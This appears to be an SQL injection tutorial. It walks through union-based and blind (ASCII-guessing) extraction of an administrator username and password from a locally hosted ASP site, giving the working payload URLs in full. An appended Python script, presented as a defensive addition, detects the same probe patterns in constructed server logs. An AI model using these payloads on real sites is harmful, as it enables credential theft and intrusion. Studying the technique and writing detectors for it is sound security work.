After learning about union queries, all we can say is that they are really powerful. But can a union query be used at every injection point? The answer is no. What? Don't believe it? Let me show you a website.
Here I build the environment on my local machine and first access a page with parameters to test whether there is an injection point.
http://localhost:2008/chanpin.asp?bigclassname=Product Introduction&smallclassname=pet package+and+1=1 returns normally
http://localhost:2008/chanpin.asp?bigclassname=Product Introduction&smallclassname=pet package+and+1=2 returns an error
and 1=1 and and 1=2 are used to determine whether an injection point exists.
Now use order by to find the number of columns. http://localhost:2008/chanpin.asp?bigclassname=Product Introduction&smallclassname=pet package+order+by+1 returns an error, which obviously should not happen. So the pet package parameter cannot be injected? Let's look for a numeric injection point instead.
Found a numeric injection point with 16 columns: http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+order+by+16
order by 16 returns normally
order by 17 returns an error.
Now use a union query to look up the table name and fields. Admin table name: Manage_User; fields: username, password
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+Manage_User is very frustrating: the page displays 1 and 2. If you don't follow, replace 1 and 2 with the field names.
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+1=2+union+select+username,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+Manage_User still displays 1 and 2. Thoroughly frustrated, but not puzzled. Switching to the string-type injection point: http://localhost:2008/chanpin.asp?bigclassname=Product Introduction&smallclassname=pet package+and+1=2+union+select+username,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+Manage_User
But the username and password are still not displayed.
This is frustrating. If we only use union queries, we cannot get into this site.
However, manual injection also has the guess-based (blind) query. Let's try that.
To determine whether an injection point exists, use and 1=1 and and 1=2, as before.
Unlike a union query, a guess-based query must first check whether a table exists.
Statement: and 0<>(select count(*) from admin) --- determines whether the admin table exists
Or: and (select count(*) from admin)>0
I prefer the second form to check whether a table exists: if the guess is right the page displays normally; if the table does not exist, an error is returned.
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+(select+count(*)+from+manage_user)>0 returns normally, indicating that the manage_user table exists.
Next, determine how many records the manage_user table holds.
Statement: and 0<(select count(*) from admin)
Or: and (select count(*) from admin)>0
Statement description: checks whether the number of rows in the admin table is greater than 0. If it is greater than 0 the condition is true; otherwise it is false.
Of course, there is normally data here, so it will be greater than zero.
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+(select+count(*)+from+manage_user)>0
If >0 returns normally but >1 returns an error, there is exactly one record.
Next, guess the field names in preparation for getting the username and password.
Statement: and (select top 1 len(admin_user) from admin)>0
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+(select+top%201%20len(username)+from+manage_user)>0 returns normally. The username field exists.
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+(select+top%201%20len(password)+from+manage_user)>0 returns normally. The password field exists.
Of course, we already knew these from the union step; if we didn't, we would still have to guess them. The rule is the same here: a normal page means the guess is right, an error means it is wrong. It's like handing in homework: when you get the question right, the teacher gives you a tick.
Next, guess the length of the content in a specified field.
Statement: and (select top 1 len(admin_user) from admin)>0
I recommend starting the experiment from >3, because usernames of one or two characters are rare, unless they are Chinese characters.
Here I guess the length is 5. We use "greater than" and "equal to" together to pin down the length.
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+(select+top%201%20len(username)+from+manage_user)>4 greater than 4, returns normally
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+(select+top%201%20len(username)+from+manage_user)=5 equals 5, returns normally
Greater than 4 and equal to 5, so the length is 5.
Guessing the content
and 1=(select top 1 count(*) from admin where Asc(mid(username,1))=97)
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+1=(select+top+1+count(*)+from+manage_user+where+Asc(mid(username,1))=97) returns normally
This means the ASCII code of the first character is 97, which is a; then guess the remaining characters one by one.
http://localhost:2008/content.asp?bigclassname=Product Introduction&smallclassname=manager folder, book folder&articleid=361+and+1=(select+top+1+count(*)+from+manage_user+where+Asc(mid(username,1))=100) returns normally
The result is d.
Finally you can work out that the username is admin. For the password, take the same statement, +and+1=(select+top+1+count(*)+from+manage_user+where+Asc(mid(username,1))=100), replace username after mid with password, and work through it the same way, one character at a time.
That's it for this chapter. This is the last chapter of the Getting Started series; in the next lesson we move on to the Improvement section.
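Every step above leaves a distinctive trace in the web server log, and the guessing stages need many requests from one client. As an added example (not part of the original tutorial), here is a small Python checker that URL-decodes query strings the way the server would and flags each probe pattern described above; the log lines are constructed, and the stage names are my own labels.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed log lines: client IP, method, path, query string, status.
# Modelled on the probes walked through in the tutorial, not a real server log.
LOG_LINES = [
    "10.0.0.5 GET /content.asp articleid=361 200",
    "10.0.0.5 GET /content.asp articleid=361+and+1=1 200",
    "10.0.0.5 GET /content.asp articleid=361+and+1=2 500",
    "10.0.0.5 GET /content.asp articleid=361+order+by+16 200",
    "10.0.0.5 GET /content.asp articleid=361+order+by+17 500",
    "10.0.0.5 GET /content.asp articleid=361+and+1=2+union+select+username,password,3+from+Manage_User 200",
    "10.0.0.5 GET /content.asp articleid=361+and+(select+count(*)+from+manage_user)>0 200",
    "10.0.0.5 GET /content.asp articleid=361+and+(select+top%201%20len(username)+from+manage_user)>4 200",
    "10.0.0.5 GET /content.asp articleid=361+and+1=(select+top+1+count(*)+from+manage_user+where+Asc(mid(username,1))=97) 200",
    "10.0.0.9 GET /content.asp articleid=362 200",
]

# One rule per stage of the injection walkthrough (labels are hypothetical).
RULES = [
    ("boolean-probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("column-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
    ("row-count", re.compile(r"select\s+(?:top\s+\d+\s+)?count\(\*\)\s+from", re.I)),
    ("length-oracle", re.compile(r"\blen\s*\(", re.I)),
    ("char-oracle", re.compile(r"\basc\s*\(\s*mid\s*\(", re.I)),
]


def classify(query):
    """Decode '+' and '%20' as the server does, then return the matching stage names."""
    decoded = unquote_plus(query)
    return [name for name, pattern in RULES if pattern.search(decoded)]


def scan(lines):
    """Return (flagged lines as (ip, stages, status), number of flagged requests per IP)."""
    findings, per_ip = [], Counter()
    for line in lines:
        ip, _method, _path, query, status = line.split()
        stages = classify(query)
        if stages:
            findings.append((ip, stages, int(status)))
            per_ip[ip] += 1
    return findings, per_ip


if __name__ == "__main__":
    for ip, stages, status in scan(LOG_LINES)[0]:
        print(ip, status, ",".join(stages))
```

A single boolean probe is weak evidence on its own; the useful signal is one client stepping through several stages, which is why the scan also counts flagged requests per IP.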